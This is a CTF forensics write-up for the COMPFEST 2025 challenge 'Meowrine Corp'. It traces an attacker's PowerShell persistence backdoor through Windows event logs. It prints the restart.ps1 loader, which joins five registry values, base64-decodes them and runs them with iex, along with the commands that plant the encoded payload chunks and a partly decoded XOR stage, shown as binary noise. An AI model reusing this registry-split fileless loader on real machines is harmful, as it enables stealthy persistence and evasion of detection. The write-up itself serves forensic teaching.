
COMPFEST CTF 2025

Forensics
Meowrine Corp
Challenge
A hacker recently got access to the computer of a high ranking admiral of the meowrine corp. We managed to kick him out and made sure nothing was stolen. However something weird has been going on over our network now. We suspect it is related to the recent hack so to help you, I’ve given you the logs during the hack and the network capture. Can you trace back the events that happened?
Solution
Traffic analysis reveals that a large amount of data was uploaded from 192.168.18.84
to 192.168.18.76
. This could be information exfiltrated by the attacker.
Investigating the logs, critical information was found in Microsoft-Windows-PowerShell%4Operational.evtx
.
A persistence backdoor was discovered in Event ID 20:
1 | $script = '$k=@("HKCU:\Environment","HKCU:\Console","HKCU:\Keyboard Layout","HKCU:\Control Panel\Desktop","HKCU:\Control Panel\Accessibility");$n=@("boot","update","load","install","exec");$s="";0..4|%{$s+=Get-ItemPropertyValue -Path $k[$_] -Name $n[$_]};iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))'; |
Creating the Backdoor Script File:
$p = "C:\Users\Whiskerstein\..."
: Defines a seemingly normal path, hiding the malicious file within a legitimate application’s folder to evade detection.$f = Join-Path $p "restart.ps1"
: Defines the backdoor script’s filename asrestart.ps1
.if(-not(Test-Path...)){New-Item...}
: Checks if the path exists, and creates it if it doesn’t.Set-Content -Path $f -Value $script...
: Writes the string content from the$script
variable into theC:\...\restart.ps1
file.
Backdoor Script Logic (the
$script
variable):$k=@("HKCU:\Environment", ...)
: Defines an array containing five registry paths.$n=@("boot","update","load","install","exec")
: Defines an array containing five registry value names.$s="";0..4|%{$s+=Get-ItemPropertyValue ...}
:- Reads the value of
boot
fromHKCU:\Environment
- Reads the value of
update
fromHKCU:\Console
- Reads the value of
load
fromHKCU:\Keyboard Layout
- Reads the value of
install
fromHKCU:\Control Panel\Desktop
- Reads the value of
exec
fromHKCU:\Control Panel\Accessibility
- Then, it concatenates these five retrieved values into a single long string,
$s
.
- Reads the value of
iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))
:[Convert]::FromBase64String($s)
: Decodes the concatenated string$s
from Base64.[Text.Encoding]::UTF8.GetString(...)
: Converts the decoded bytes back into a UTF8 string.iex
: (Invoke-Expression) Executes this string.
Instead of writing the full malicious code directly into the .ps1
file, the attacker Base64-encoded the payload, split it into five parts, and hid each part in five different, seemingly harmless registry values.
Next, while examining the rest of the logs, traces of the attacker using PowerShell to write malicious content to the registry were found:
- boot (from Event ID 14)
1 | New-ItemProperty -Path "HKCU:\Environment" -Name "boot" -Value "JHg9MTA5OyRjPSdTUjlOVUVvVkNBUVJSRVJLU2xrN09neFZBVDRtVkFFRUl4VWFQaVlVR2dRTUJnb1VOeGdCQUE1ZEl3TTBYQ01CSVFJL0xpWUJQelVJTGxRcU8xc0NPVFZkSnpVM1gxaGZEeWtaWEFnZEpEazlId0lxSjFvS0tna0RXRG8zSUZndURBWThKUThaQWlvbldpdzVQUncvTGlZVVZBQTNBaXdvSmdOWU9nd1VQMTQ0WFR0ZlB4Z0dPRDRwSXpzOFd3STVOUU5ZT2d3R1ZGODBHRHNHSVYwRk5UYzRXRDRQQVQ5ZURsZ2pYRHBhWFRVbUZWMHVERjBKQUE4QkZRWWhBajh1SVJvS0ZEY1lBUUFPWFNNRE5Gd2pBU0VDUHo0OUFqOFVDQjBzT1RjWVhBUWdBUW9xQ1FOWU9qY2dXQzRNQmdvRU54MFpCdzRHWFNrTUJoNDVDeDhlTGc0R0hqa21IVDgrSVFJL1hqY1lPeW81R0NBbEp4NG9LU1lZQVRvNVd3STVOUUkvTlRRakdUczlId1lxSjFwZFhqUUdYUmNtSFQ4VUloMGdLaWNlQmlvbkFnNEFEeDBuSlFrWEp6b0pPVmdVRGdaZEZ5WVVQeFFJSFN3cENRTmNGRFFHQ2dRM0hSazVKaDAvUGlFQ1AxNDNHRHNxT1JnZ0pTY2VQQ1VuQWxrNkRDTWRCeUlKQlNvSkJWeGRPbFFnS2lkYVhWd2dBU3dsSnc4QkZDQWVKQ2toRlFvdVBGUThKU2RhQVM0TVhRa0FEd0VWQmlFWFB5NEpIbHcrREFZS1BqY2VBU29NWGhrcElGUXNKU2RhTERrOUhUOFVJZ01PUGowVVB4UWlBd1lxSURzbk9TTUdDUWMwUEFrcElnYzNGejBYTkNraldnNDVJRjgzT1NBWE5DazNIdzRwTnhVT0J5TUdDVGtqSXpjNUl3UUpCejhCTnpraUx6Y3BJem9KT1NjQk53YzNCVFFYSUJjOEtTQllEaGMwT2pjcEl4OEpPUTRCTnpraldqUVhORG8zS1NOWU5CY2dXanNwSUFvbk9RZ0JOd2MzQ1RjNUlnVTNCenBkRGhjZ0h6YzVJQTQvQnlZVURnYzNIelFISUFFSk9TQVVEamtqWFQ4cE53RW5LVDBhSkRralhqY1hJQmczRnlRVURnYzNHalFISXhrL09UZ0dKeWtnSGljNU5BQUpGemdHTndjak9na1hJRDgzT1NaZEpDa2dGU2NwTnpzM0J6ZGNOQ2tqWHc0NUlnOC9LU1lHSnprakZ6Y0hJd0VPRnpVQU55azNYalE1SXlFM0J3a1VPQWMwRkE0NUlpOG5GemtGQ1NrM05UY0hJeUlKQndnWE5Da2pHQ1FwSUNrbkZ6cFpOQ2tqR3drNUlBRTBCeVlhT0NrM1hDY3BJd1lKRndrWERqa2pSalFwSXgwNEZ5TlpKQWNqRkRjNUlrWTNPU01FSXhjME9EY1hOQUkwS1RoY0RqazNJejhwTng0bkJ3OWREamtqR2c0SE55dy9Gd2dIQ1RrakJEUTVJd01KQnd3Qk56a2lHelFwSTE4T0J3a0JOd2MzWFRjWElEby9PVHhZRGhjME9qY3BJMW9KRnlNQk56a2pJRGNYTkNFM0Z6NVlOQmNnSERncElDUW5PVGNCTndjM0ZUYzVJZzQzQnpoZERoY2dMRGM1SUFjOE9UVVVEZ2MzWHpjSElDWUpLVG9VRGprak56OHBOd1luS1F3YUpDazNSZ2s1SWh3bk9UZGZORGtnTkRjNUl6dzNPU01IUHlrM0J5Y3BJQWNuRnpzRkNTazNRalFISTE0T0J3a1hOQ2tqT2ljcElCa2tGemxaTkNrakRnazVJQVEzRno0YU9DazNIaWNwSTFVSktRbFlOQmMwQmpjcElBQUpGenNYT0NraUppY3BOd2dqQnlNVUpEa2pHRGNwTng4M09Rc1ZORGszS2pjNUl4VTBPUTRITnpraVhUUUhJMTA4S1FzR0p5a2lWRHNISUQwbk9UNEVDU2tnSFQ4cElCc2tGejhYRGdjZ1dnNDVJeWMzQnlSZE5Ea2dSalE1SXpjM09UVlpQQ2szSlNjcElGa25LVDRVSkNrM096YzVJRmczQnlCY05BY2dCd2twSXhnT0J6Z1hEaWszR0NjcEkwWUpCelJjTkNrakFna1hJQXczRnowQU53YzNJU2M1TjE0MEJ5WUFOemtpS3pjcEl3VU9PU0FWTkJjZ05UYzVJaU0zT1RzSE55a2dCd2twSUJVT09Ud1ZOQWNnUHljcElDRW5PU0JjTkNrZ1d3azVJanNKQnc1ZE9Da2pHQTQ1TndBM0tUNWNOQ2tqS2drNU4xdzBPU2N" -PropertyType String -Force |
- update (from Event ID 10)
1 | New-ItemProperty -Path "HKCU:\Console" -Name "update" -Value "BTnhjZ0dEOHBOeWduRnpnYUpEazBGUWtwTjE4M09RdGZEaGNnSGpRcEl6VW5LU0lhSkRralhqY1hOQnMwQnpWWU5BY2pIejg1TjFrM0tUUllQQ2szWENRcElCZ25CeVJkRGhjZ0RBa0hOeFUwQnljYU9Da2dDQ2NwSTFzMEZ3NEFOeWtpQVRRcEl4Z0pLUWxjTkNrM0FUOHBOeGNrT1NBYUpBY2dDU2NwSTFRM0tTSVZOQWMzSnpjWE5CazBLU0lhRGpralBBa0hOMFlrRnc0YUlDa2lGU0FwSUFrak9TTlpJRGswWHlNSEl4b2pPU1JlSURrM1ZTY3BJaHdnT1NFVklEazNDQ2NwSWxzaktRbGZJRGtnSmlNNU53Y2tLVGdVSURraU9pTTVJQWtqQnowQUp3YzNIU1E1TkFJaktTY2FEaWtqV0E0cEl3UU9PVHBaTkFjZ0JpUXBJRmdrS1F4WU5BY2dYdzQ1SXhjNEZ3Z0dKeWtnSHljSElCd0pLVDFlRGpraUFqUUhORDhqRnpSY05Ea2pSZzQ1TndNM0Z6aFlOQ2tqUGdrNU56YzNLUXdBTnhjZ0t6ODVJam9KS1NZSE55a2pEQWs1TndRM0J5ZGNOQmMwWERRNUlsazNCemtYT0NrZ0J5YzVOeGcwS1E4QU56a2lCamNwSTFVSkJ3Z1hORGtnWEQ4SElCc0pPU0FBTndjZ1d3a0hJQ29KS1RSY1BDazNYaVFwSUY0a0tRNWNOQmNnR1RRSElBZ0pCd2tBTndjakNUOHBOeWduT1NRYUpEazBYalFITkFvM0J5TmRORGtnUGpjcEl3ODNGd2tYRGprM05UY0hJd1UzS1RSZEpDa2dIeWNwTnlJM0Z6VmNOQ2tqSVFrNUlsODhPU0lHSnpralh6UUhJeWtKT1QwQU55azNSamM1SXljM0Z6a1VPQWMwRnlBNUlrSWtGd2dYRGprakJUUXBJeThKS1RkWURnY2dPVDhwSXgwMEZ3NWNORGszUERjNUlqbzNGeUlVTkNrM0FEY0hOeXczQnpnWE5Da2pYaVFYTkNBbktUc0ZDU2szRHpjSEl3Y0pCeVFYTkNralZTY3BJZ1VuT1NBWERqa2pMemNwSXpvSk9UbFlEZ2NnRGo4WE5DQTNCemtITnprZ1d6dzVJeGszQnpWZERqa2lHRFFISUJrT0J5ZGVPRGswQWlNNU5Da2pGd2dHT3prakN6Y1hORjgwT1FoWU5BY2pGRHc1TndrbktUY0FQemtpWFQ4NU4xb2tPVDhHTnpralhEY3BJd1FPRno4WERqa2lBQTRYSUZ3N0tUUUVPd2MwV1NBNUlCUTNCelFHTnlrakNEY3BJd1VrT1FnRUp3Y2dGelFwSWxVM09TRmVORGtnSHpRSElGNDNCenRlTkRrZ0ZUUXBJeFFuT1RVRUp3YzNYemNISUFZSk9UdGNOQWMzR2pRNUlBd0pPU0FhRGlraldpUXBOMXNqS1RzWERqa2pYalFwSXlzSk9UeFlEZ2NnWFQ4cEl3bzNPVDVjTkRrM0FqUTVJaVEzT1NNVU5DazNIelFITngwME9UNFhOQ2tqR1NRSE5DY2pGeVpZSkNraUhTUTVJeDAwT1RRWERnYzNIemNwSUFjSkJ3NFhEamtpQmpRcEl3WThCendCSnhjZ0ZRazVJQmszRnc4Vk5EazNORGNISXdFMEJ5Y1ZOQ2szUmpRcEl6VTNCeVJkSkFjMEJDQTVJbHNrRno5Wk5Da2pBUWtYSXlRM09RZ0JOemtqWGpjWE5GUS9CeUlCSnhjZ0h3azVOMXcwQnljRU54YzBXRFE1SURjM0J3OEJOd2NqQXpjcEkxUTNCenBkSkJjMEFTUXBJRHNqRndrSEp4Y2dCZ2s1TnowM09UUUVOeGMwRGpjNUlDbzNGem9CTndjalZEY3BJeGcwS1NOZEpDa2lIU2NITkZrM0Z3a1hOQWMzSFRRWE5CVTNPVDhVUEJjMENUYzVJQ2MzRnprQk56a2lIVGNISXhvL0J6OEdOd2NnV3c0SE53QTNCeU5mTkJjZ1h3NDVOMTQzQnd3Vk5BY2dSZ2twSXhzNEZ6Y0JKd2NnSVFrSE56dzNPVHBkRGlrZ1ZBNDVJaHdPS1R3VURoY2dBalE1TndBMEJ3NWNOQ2tqQnljcE55UWpGeUFVTkNraUJEUVhJeDgwQnowVk5BY2dWRGNYSXhjMEJ3a1ZOQ2tqWGljSE5Ca2dLU1pZSkRrMEF6Y0hOQ2szQnpWZE5Ea2dBemNwSXdJM09Ud1hEamszQVRjSEkxczNGd2xkSkNraVhDY1hJQVFPRnlOY05Da2pIUWs1SWlNSk9RNFVQQmMwTHpjWE5EZzNLUThWUE" -PropertyType String -Force |
- load (from Event ID 16)
1 | New-ItemProperty -Path "HKCU:\Keyboard Layout" -Name "load" -Value "NralZEUTVJQUkwT1F0Y05BY2dCRHM1TkE0akJ6c0ZJeWszQURnNUkxODNGenNITnpraU5UY0hJd2cvS1NZQkp3YzNDajg1SWhrOEJ5UUJKeWszQlRRNUl4MDNLVHRkRGhjZ09BazVJZ0lKS1FzWE9BYzBBRGdwTnhzakZ6c1hEamszWHpjSE5CYzNLVDBITnprZ0FUUTVOMXMwQnpSZk5Da2pLRGNwSXdBbkZ6NEVJemtpT3ljcElsc2tPVDBVRGdjM1JqUXBJMVVKQnc4YURqa2lId2tISUNnSkJ3c1hORGszWGpRNUl5dy9PVHhjTkNrakhnazVJQmMwRnpwY05BY2dPZ2tYSUVZL0Z5UUJKeGNnV1E0NUlCazNCeWNWTkRrM0tqY0hJd1EzS1RjVk5DazNJemNwSTFvMEtUVmRKQ2szSGlNSElCNEpPVDBBTnlrak9Ba3BJQm9KQnpsWURnY2dCQWtYSUZvME9RZ0JOemtqRkRRcEl4b25GemdFSXprZ09UY3BOeWczQndsZE5Da2pRaVFwTnl3akZ6UmZPRGtpVlQ4NU53b25GeU1YRGprZ0dEUTVJQTQzS1E0Qk53Y2pYalE1SUZzMEZ6b0dOeWtqSERRcEkxMG5GejhFSXdjM0d6UUhJRndKS1QxY05BYzNJemM1SUFBSktUb2FEaWtqWFNRcE53QWpGd3hZRGprakhUUUhORHcvQnc0Qkp4Y2dCZ2s1SURrM0J5SVZORGszRHpjSEkxazNPUWtWTkNrM1ZEY3BJejAzT1NaZEpBYzBPU001SWtZa0tRaFpKRGtqRnpRcEl3SU9CemdWTkRrakJUUUhJQThKS1NNWFBEazBXaUE1TkFNak9Ud0dPeGNnT0FrNUkxVTNGd2tWUERrM1JpUTVJaXNKRnpSWk5Da2dYUWs1SUFJM0Z6VVVEaGNqQWpjSE56UTNPVGxkRGlrZ0pnazVJZ1FPT1RRVURoY2dIVDg1Tnh3bkJ3aFlEaWtqR3drNUloazBGd3dVRGprald3NFhJRGMzQnlCY05CY2dGVGc1Tnlrbk9UUUdOemtqQlRRcEl3VUpGeUFYRGpraUtRa1hJQ003S1NjRU95azNPQ01YSUFVSktUb1ZORGtnQlRRNU54ZzNPVHRmTkRrZ0NqY3BOeGMzS1R4ZE5Da2pCQ2NITkFVZ0J6aFlKQ2tpQkNRNUl3azNGejhYRGdjM0JqUXBJQmNPT1NJWERqa2lDVGNwSXpjL0tTTUJKeWszQ3pjcEl3WTNCejFmTkJjZ0dna0hJeW8zQnpnRkNTa2pIU2NITkFJZ09UUllKRGtnQnpjcE54ZzBGdzlkTkNralJpUXBJaGtuRnlJWERqa2pBVGNwSXlnSktTZFlEZ2NnRkQ4cEkxc0pPVDFjTkJjaldUODVOMW9rQnlZR055a2pXVFFISXdVMEtROFhEZ2NqSGpRNU5Ca0pPU0pkSkFjME9pTTVJaGduRnpnQU53Y2dGUTQ1SXg0M0J3a0FOemtnV2drcElEb0pLUWxkSkNraUlTY1hJQ0VKRnlOY05Da2pEZ2s1SWc0SkJ5SVVQQ2tqQUE0NUl4ZzBCejllUERrM1h5UXBOeFUzT1RsZE5BY2pEemNYSUJ3T0Z3aGZORGswV0FrcEl4c25Cd2tFSXpraUlDY3BJa0lrS1RWY05Da2pSZ2s1SURvM0tUMWNOQWNnR1FrWElBYzhGdzRGSXprMEZ5TXBOelE3Rno4VURqa2pXalFwSXdVM0J3bFlOQWNqQUFrSE54MDNLVDBVRGlrZ1ZEZzVJMXMwQnc0WE5Ea2lWRFFISXhvT09TWVVEamtqSHpRWElGNDdPVG9BTnlrakhBNHBJQVVKS1Q5WURnY2dKd2tYSUJnOE9TQmVQRGszUGo4SElBVTdPVG9CSnpraUtna3BJajgzRnprYURqa2dWVFFISUJnT0J5TmVOQWMzQURjcEl5Z0pGemNhRGpraUhnNEhJQlFKT1FzWFBEazNHU1E1SWxVSk9UdGREamtpRERjSElCa09GejljRGhjZ0pEYzVJejQzQndzWE9EazNHQ1FwTngwM0Z3eGNOQ2tqQkE0WElGa0pCd2hZRGhjZ0l6c0hORlU0S1RrR0l5azNHelFwSTFrM0tRNWZOQmNnVlFrSEl5NDNPU0lGQ1NraldDY0hOQ3dqS1NkZklEa2dPeU1wSUFrbkJ6UUdPd2MwWFRnNUl3NDNLVFJkRGpraVJnNEhJRGczS1R3YUpDa2pWUTRYSUN3M0J5SmNORGswWERRSElCVTNLVDhBUHlrM0FDY1hJeThKQnpsY05EazNIVDhwTnlRak9UZ1ZOQ2szRlRjcEl6czNGd2xkSkFj" -PropertyType String -Force |
- install (from Event ID 12)
1 | New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "install" -Value "MFZTQUhJd1FnT1RVVklDa2dOU2NwTnlJN0Z3NEVPemtqRGpjcEkxd0pPVDVZRGdjZ1hqY3BJRGNuRnp0ZERoY2dKRGM1STFrM0tRZ0ZOd2NnVlRRSE54NDhLUXdHSnhjakJ3azVJd1UzRnpRQlB5azNJeU1ITndVMEJ6Z1VEamtqRERjSE53QTBLVDRWRGlrZ0t3a3BJeGNrS1FzRUNUa2lXQ2M1TkJnM0Z3NEVOeWtqS2pjNUlBczNGemRkTkJjZ0NnazVOd2MwQnlSZk5Da2pLaWNwSUJvbkZ5TlpOQ2tqWGc0NUlDODNPU01hT0NrM0JDY3BJeUlKQnprWERqa2pBVFFwSXg4NEJ5SlpKQWNqQVRjNUlqMDNCeVlFSXpralhUUTVJeGdKS1RnQk56a2lJRGNwSXhvSkZ5RUJOd2MzV2pRWElBYy9GejlZRGhjMEpEY3BJelVKT1NFQk56a2pKRGNYTkFJM09TQllOQmNnTnpzcElBUWtGeU1CTndjM1dqUTVJa0kwRnc5ZERoY2dGelE1SUJ3OE9TUVVEZ2MzT3pjSElGUU9PU1lVRGpraktUOHBOMVFrT1RRYUpDa2pEd2tYSUQ0SkZ5WmNOQ2tqSWdrWElDWUpPU0lWTkFjalBEOHBJQThuS1RRSE56a2pIalFISTFVT09TZGNOQmMwUHo4NU4xZzNGelFBTnpraU9UY1hJQjBPS1Q0WERqa2pJVGNISURzSkJ6MGFEaWszWFRjSE53TTNCeVFYUENrM1hpUXBJQWduRnpvRk53YzBMamNwSXdrM09Rc1ZOQ2tqSlRjWElEc0pGeVFCTndjalhEUXBJMVFuT1R3YUpDa2lBemNwSXhrSkJ6OFZOQ2tnT2pzNU4xbzNGemdBTnpraVBqY3BJeVFKQndzVk5EazNXelE1SWpRM0J6UmREaGNnS0FrNUl6czNPUTVkUENrM0FTY3BJQVFuRnpwY05BY2pPQWs1SWpvM0Z6OVpOQmNnRHpjSElGNE9CejhWUENrM0JpUVhJRlVKQndrWERqa2pBRFFISUZzSkJ3NGFEaWszQ2pjSE54VTNLU01YUEJjMFhRNHBOd0VPT1NBVUpDa2dGQWtwTnhnM0J3bGREamszSENjNU5EMG5GemNVSkNrZ1dDUTVJem8zS1Q0RU56a2lWVGNYTkFBM0Z5WmREZ2MzUFRjNU53RTNPU1lHSnlrZ1BDYzVJMXMwQnpvR056a2dGRGM1TndjL0J6a0JKd2MzRlRzcEl5Y25LVGthSkNralBUYzVOeGMzQnowVk5DazNKU2NwSUZza0tRa1VKRGswV3ljcEl3c0pGd3dhRGpraU5EY0hJQVVPS1NZWE5CY2dCQTQ1TnlrM0Z5TVZOQWNnV2c0cEl6MEpCd3dGSndjZ0JTUXBJQmtuT1R4Y05BYzBIamM1SWw4ME9TRUhOeWtqQndrSE53STNPVGtCTnlrM0xDY3BJQXNuQnlOY05DazNDemM1SUJjM0Z5SUJQemszQnlRSE4xUTRPU0ZkSkNrZ0dpUXBJeGczQnowQk56a2dXVGNwTnlZbktUVWFKQWNnSndrNUl3STNCdzRCTnpraVdqYzVJQUkzRnpoZERqazNWVFFITjE0MEtTSVhQQmNnWHdrNUlpNC9GdzhYT0NrZ0NUczVOeUluT1FnQU95a2pHU2NwSUY0bktUeGREZ2MzQWpRNU54czNPUXNHSndjMEhBa3BJem9KS1E4WE5Ea2pYamM1TkFJMEtUc1VOQWMzTno4cE4xa25PUTljTkFjZ0h3azVJd2czS1FsWk5CY2pHRGdYTkIwT0J5ZGNOQmMwR2pjNUloNDBPVFZmUENrM1dTY3BJQVFuRno1Y05CY2dId2tISUZzSkZ5UmNEaGNnT2pjNUl5azNCeUFVT0NrM09DY3BJQlVrS1RVVUpCY2dGQTRwSXljSkJ6Y0JOemtqUWpRcE54bzBLVDFjRGhjZ0FqUUhOeGcwQnc1ZFBCYzBCVHM1SXc0L0J6VUhQemtpWGp3SEl4US9CdzhBUHdjZ0lEc3BJQlU0T1NFVU9Ea2pQajhYSUFZNE9UVmNPRGswV0NNSEl3a0pCdzRCTnprakxEY3BJMW9rT1RrVUpDa2dCeVFwTnl3M0Z3aGNOQ2tqVlE0NUlpTS9PVHRkTkJjMEFEUTVJalEzT1NCWk5CY2dMejhwTjFnbkJ3aGREamtqUERjWEkxNDhPVFFFQ1RraVdnNEhJQlFKQnp0ZERnYzBPaU1ISUFrbk9TY1hORGszRnpRNUl5STNPU0VCSnlraUtEY0hOQ1kzS1Q0Rk53Y2pCVGNYSUE4Sk9UaGRORGtnSHpjNUlCbzNLVGRkSkJjME" -PropertyType String -Force |
- exec (from Event ID 18)
1 | New-ItemProperty -Path "HKCU:\Control Panel\Accessibility" -Name "exec" -Value "5Uc3BJRUk0T1FzR1B6a2pJRDhwSXlnN09Ra0ZJd2NqV0FrNU54MDBLVDljTkNrakJpY0hJQVlrT1NjR0l6azBEQWtwTnhjMEZ3aGZEaGNnSURjcEl3OG5GejhFSXdjZ0Z5Y3BJRFVKT1QxWU5EazBMQWs1Tnhva0tUcFpOQWMwTGpjNU5GMDNCeVJmTkJjZ1hRa3BJd3MzQndrVk5Ea2dXVGNwSXdVbkJ6Z0hPeWtnSERncE53NC9GeUpjUENrakRqczVOQThqQnd0ZkRqazNGVGM1STBZMEZ6ZGRKQWNnV2lRcE4xb2dCejBGTndjMFd6Y3BJeDAwQno4Vk5Da2pKVGNYSUFJSkJ5RUJOd2NqR2pRcEkxc2tPVGNFSXpraUl5Y3BOeUlKRnlJR096a2lXeVFwSWtZMEZ5UmREaGNqTERjNU54VTNLUXhjTkJjMEl6ODVOd2NrS1NBVVBEa2dDejg1SWtZM0tReFlORGtpUEQ4NUlqUS9LU0JZUEFjZ0lqOEhJQm84T1FzVVBBY2dDajhISUZvOEtTRVZQRGtnQXo4NUlEVS9LUXdWUERrZ1ZUODVJQUUvT1Q0VlBEa2dHVHc1SUJ3OEJ6b1ZQRGtnT1Q4NUlGczhCemdWUERrZ0lEOHBJeGduT1NRYUpDazNQVGM1SXhVT0tUb0dOemtpSVRjcEloVUpPVGtWTkNrM0dEd3BOd1FuT1NjYUpDazNPamNITnp3M0Z6cGRORGszS1RjNUlBRTBCem9VT0NrM09pY3BJMTRKS1RwY05CY2pCandwSWgwbkJ6VUVPd2NnQ3o4NUlDay9GemxZTkRraU9EYzVJancvQnpoWVBEa2lKajhISUFNL09UOFVQQWNnS3o4SElDUS9GelFVUERrZ05EODVJQmsvT1NjVlBEa2dXanc1SUZRL0J5RVZQRGtnSGp3NUlBYzhLU0FWUERrZ1dqdzVJQmc4S1FrVlBEa2dCejg1SUFnL09UdGRKQWMwWHdrcElsNDBCelVYTkRrZ0tqYzVJelUvS1RVVURnYzNIVGNISXgwL0tUa0hDVGtpSmljNUl3a2pPU1lWSURrM0NTYzVOeDhuS1Q4VklDa2lEaWNwSWpjbktTQUJOemtpWHpjSE54czBCemNGTnlrM0xpY3BOdzRqT1E5Wk5BYzBIamM1TkZVME9UMWZOQmNnQXdrcEkxUTBCelFWTkRrZ0tqY3BJd1VrQnlRRUl4Y2pCQ1E1TnhjT09Ua0dDUWMwSHc0cE55dzdCeU1FT3lrM0hpQXBOMThrS1QwRUp3YzNJRHM1SWc0bkZ3eFpKQWNqV0NjNU54azRGemRjSkNrakZTUVhJQ1FuS1Q0YVBEa2dHeVE1TkFjT0J3OVlEaWtpRkE0WEkxb09CeUZmRGprakJRa3BJd29KRnlBWERnY2dDd2s1SUFFSkZ5QWFEZ2MzSFRRNU54YzNGendHTnhjMEFEY0hORG8zQnc0Rk56a2lCelFwSWxrM09UVmVOQWNqRGpjNUkwWTBGenhkTkJjZ05UY0hJQlEwT1NjVk5EazBJRHM1SWdjN0J6OVpPQmNqTkRzSEl6ODdCenRjT0NraldUZ1hJRVk0QnowVU9Ea2dKRHNwSUFVNEtUMEFQemszWGp3cE54OC9GdzhIUHdjME9UODVOQVk4T1NkWVBDa2lLVDhYSXlRL0tRdGZQRGtqQWo4cEkxcy9GemdYUEFjZ0pEODVJRFEvT1FsWUlDa2lCU01YSTFrakZ3bGZJRGtqUHlNcEkxNGdGdzRYSUFjZ0ZTQTVJQm9qT1NNYUlCY2pCaVFwTnlJakJ5UVVQRGtnSHo4NUlrWTBPVGhZTkRraUhqdzVJamcvQndsWVBBY2dLajhISUJjOEZ6NFVQQWNnUHo4SElCbzhCejRWUERrZ0JEODVJQWsvS1RRVlBEa2dKVDg1SUFFOEtRd1ZQRGtnRkQ4NUlBQS9CeVlWUERrZ0xqODVJRjQ4T1RvVlBEa2dWRDhwSTE0bkZ5ZFVJQ1VuU2twRkNnTUVIeGsrV1ZzSUhnd3ZBQUlmSzFkWE1Ca2ZDQnNEQWk1REFBZ1pIaFErTmtVS0F3UWZHVDRaQ0NwRFZTczVPRmRYTUFvREJBa0NEZ01vUXhrVkNEbERBQWdaSGhRK05rcFdTUjgyUUZ4RFEwQkZTUjlESVFnRENoa0ZSREJOUUFjQ0JBTk5Ta3BORVUwRUNCVT0nOyR4ZD1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjKTskcmQ9Jyc7Zm9yZWFjaCgkYiBpbiAkeGQpeyRyZCs9W2NoYXJdKCRiIC1ieG9yICR4KX07aWV4ICRyZA==" -PropertyType String -Force |
Concatenating the values in the order boot
-> update
-> load
-> install
-> exec
and then Base64-decoding the result yields:
1 | $x=109;$c='IMPJDDJJY;:U>&T#>&
7 ]#4\#!?.&?5.T*;[95]'57_X_)\$9=*'Z
*	X:7 X.<%*'Z,9=?.&T 7,(&X:?^8];_?8>)#;<[95X:T_4;!]578X>?^X#\:Z]5&].]	 !?.!
7 ]#4\#!?>=?,97\ 
*	X:7 X.
7])9.9&?>!?^7;*9 %'()&:9[95?54#;=*'Z]^4]&?" *'*' '%	':	9X]&?,)	\4
79&?>!?^7;*9 %'<%'Y:#"	*	\]:T *'Z]\ ,%' $)!
.<T<%'Z.]	 !?.	\>
>7*^) T,%'Z,9=?">=?"* ;'9#	4<	)"7=4)#Z9 _79 4)7)7#	9##79#	?79"/7)#:	9'774 <) X4:7)#	979#Z44:7)#X4 Z;) 
'977	79"7:] 79 ?&74 	9 9#]?)7')=$9#^7 7$74#?98') '94 	87#:	 ?79&]$) ')7;77\4)#_9"?)&'9#7#5 7)7^49#!7	849"/'9	)757#"	4)#$) )':Y4)#	9 4&8)7\')#		9#F4)#8#Y$#79"F79##48744)8\97#?)7']9#7,?	9#49#	79"4)#_	77]7 :?9<X4:7)#Z	#79# 74!7>X4 8) $'977779"78] ,79 <957_7 &	):9#7?)7')$)7F	9"'97_49 479#<79#?)7') ';	)7B4#^	4)#:') $9Y4)#	9 7>8)7')#U	)	X447)  	;8)"&')7##$9#7)779497*79#4979"]4#]<)')"T; ='9>	) ?) $? Z9#'7$]49 F49#7795Y<)7%') Y')>$)7;79 X7 \4 	)#8)7')#F	4\4)#	 7= 77!'97^4& 79"+7)#9 4 579"#79;7) 	) 9<4 ?') !'9 \4) [	9";	]8)#97 7)>\4)#*	97\49' 7 ?)7('8$94	)7_79_ 4)#5')"$9#^7445X4#?97Y7)4X<)7\$) '$] 	74'8) ')#[4 7)"4)#	)	\4)7?)7$9 $ 	')#T7)"47'744)"9#<	7F$ )" ) 	#9#Y 94_###9$^ 97U')" 9! 97')"[#)	_ 9 &#97$)8 9":#9 	#= '7$94#)')#X)#9:Y4 $) X$)X4 _9#8') ' 	)=^9"44?#4\49#F9778X4)#>	9777) 7 +?9":	)&7)#	977'\44\49"Y798) '974) 79"7)#U	49 \? 	9  7 [	 *	)4\<)7^$) ^$)\4 4 		 7#	?)7('9$$94^44
7#]49 >7)#7	9757#7)4]$) ')7"75\4)#!	9"_<9"'9#_4#)	9= 7)7F79#'7984 9"B$9#4)#/	)7X 9?)#4\497<79":7"4)7 77,784)#^$4 ');	)77#	$4)#U')"'9 9#/7)#:	99X ?4 7979 [<9#75]9"4 '^894#94)#;9#74_49X4#<97	')7 ?9"]?97Z$9?79#\7)#?9"  \;)4;4Y 9 747)#7)#$9' 4)"U79!^49 4 ^7;^49 4)#'95'7_7 	9;\4749 	9 )#Z$)7[#);9#^4)#+	9<X ]?)#
79>\49749"$79#4)74749>4)#$4'#&X$)"$9#49477) 	9"4)#<<' 	9 749747#4'4)7F4)#57$]$4 9"[$?Y4)#	#$7979#^74T?"' 	97\4'74X49 777#7)#T7:]$4$) ;#	' 	97=7947479 *7:7#T7)#4)#]$)"'4Y7	474479?<4	79 '7979"7#??7 [7 7#_4 _97^74 F	)#87' !	7<79:]) T9")< 497 4\4)#')7$# 4)"4#4=4 T7#4	4)#^'4 )&X$9474)75]49 7)#79<977#[7	]$)"\' #\4)#	9"#	9<4/7487)<)#T49 49\4 ;94#;#)7 89#_7;79"57#?)&'7
?9"<$')749#7);] 8	9"	)84 8)7#;97_747)=79 497[44_4)#(7)# '>#9";')"[$9=7F4)#U	9"	 (	497^49#,?9<\4)#	9 4:\4 :	 F?$' Y9 7'497*7#7)74)7#7)#Z4)5]$)7# 	9= 7)#8	) 	9X 	 Z4979#4)#'8#9 97)7(7	]4)#B$)7,#4_89"U?97
